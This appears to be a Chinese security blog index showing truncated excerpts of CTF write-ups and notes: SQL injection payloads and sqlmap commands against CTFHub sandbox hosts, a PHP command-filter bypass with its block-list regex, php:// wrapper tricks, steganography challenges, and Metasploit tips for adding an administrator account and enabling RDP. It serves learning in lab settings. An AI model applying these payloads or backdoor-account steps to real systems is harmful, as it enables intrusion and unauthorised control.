梦~醒🍇

[TOC] 1 漏洞验证相关概念 1.常见概念 POC：全称 ’ Proof of Concept '，中文 ’ 概念验证 ’ ，常指一段漏洞证明的代码。 EXP：全称 ’ Exploit '，中文 ’ 利用 '，指利用系统漏洞进行攻击的动作。 Payload：中文 ’ 有效载荷 '，指成功exploit之后，真正在目标系统执行的代码或指令。 Shellcode：简单翻译 ’ shell代码 '，是Payload的一种。Shellcode也有很多种，包括正向的，反向 的，甚至meterpreter。 2.POC与EXP对比 POC是用来证明漏洞存在的，EXP是用来利用漏洞的，两者通常不是一类，或者说，PoC通常是无害 的，Exp通常是有害的，有了POC，才有EXP。 3.Payload与Shellcode Payload有很多种，它可以是Shellcode，也可以直接是一段系统命令。 4.Payload与EXP 同一个Payload可以用于多个漏洞，但每个漏洞都有其自己的EXP，也就是说不存在通用的EXP。 5.Payload模块 在Metasploit Framework ...

[TOC] 整数型注入 看到源码了，直接sql一套秒了 字符型注入 SQL 报错注入 构造payload 1 and (select extractvalue(1,concat(‘~’,(select database())))) 后续步骤跟sql基本步骤一样 SQL 布尔注入 人工测试太麻烦，这里直接使用sqlmap,知道这有sql注入漏洞，就省去扫描步骤了。 先查看当前数据库 --sqli 1sqlmap -u 'http://challenge-3fe138f1ff2d9eae.sandbox.ctfhub.com:10800/?id=2' -batch --current-db 再查看表 1sqlmap -u 'http://challenge-3fe138f1ff2d9eae.sandbox.ctfhub.com:10800/?id=2' -batch -D 'sqli' --tables 查看flag表中的字段 1sqlmap -u 'http://challe ...

[TOC] php://伪协议是php提供的一些输入输出流访问功能，允许访问php的输入输出流，标准输入输出和错误描述符，内存中，磁盘备份的临时文件流，以及可以操作其他读取和写入文件的过滤器。 首先看到题目提示传个file，遂/?file=…一个随意参数，而后得到源代码 123456789101112131415161718<?phpini_set("allow_url_include","on");header("Content-type: text/html; charset=utf-8");error_reporting(0);$file=$_GET['file'];if(isset($file)){ show_source(__FILE__); echo 'flag 在flag.php中';}else{ echo "传入一个file试试";}echo "</br>" ...

[TOC] [MoeCTF 2021]babyRCE 考点：关键词过滤 来源：nssctf 123456789101112 <?php$rce = $_GET['rce'];if (isset($rce)) { if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) { system($rce); }else { echo "hhhhhhacker!!!"."\n"; }} else { highlight_file(__FILE__);} 先用ls查看 构造payload： 1?rce=ca\t${IFS}fl\ag.php 注意：1. ...

[TOC] Misc [Week1]真真假假?遮遮掩掩! 考点：压缩包伪加密，掩码爆破 下载附件有一个压缩包，打开发现需要密码，放进010查看 伪加密，直接修改 根据提示，想到是掩码爆破 SHCTF{C0ngr@tu1at1ons_On_Mast3r1ng_mAsk_aTT@ck5!} [Week1]拜师之旅① 考点：损坏文件，png隐写 下载压缩包解压，有个损坏的图片，放进010查看 缺少png文件头部，补上复原 修改高度，得到flag [Week1]Rasterizing Traffic 考点：流量分析，光栅图解析 经过分析，发现png图片，直接查看或导出来（显示分组字节或导出分组字节流） 光栅图，使用工具AabyssZG/Raster-Terminator: CTF之光栅图秒杀器 (github.com) 下载下来后需要将第75行的三维数组改为二维，这题才能用 输入命令 python Raster-Terminator.py -x 1.png 得到光栅图，连在一起就是flag。 [Week1 ...

kali中metasploit使用 shell命令会开启目标机的cmd控制台，打开了这个就相当于可以执行任何命令。 打进去后，进行远程桌面连接的注意事项： 1.创建用户：net user username password /add 2.赋予用户管理员权限：net localgroup group_name UserLoginName /add 3.没有赋予管理员权限远程桌面连接是会失败的。 4.win7不能同时登陆一个账户，比如目标机登录了一个账户，攻击者在进行远程登录桌面时会把目标机顶下去。 一些注意事项： 1.run后报错Host does NOT appear vulnerable.：说明靶机打了补丁的，修复了永恒之蓝漏洞（补丁：KB4474419），删除就可以了。 2.run getgui -e报错：换成 run post/windows/manage/enable_rdp即可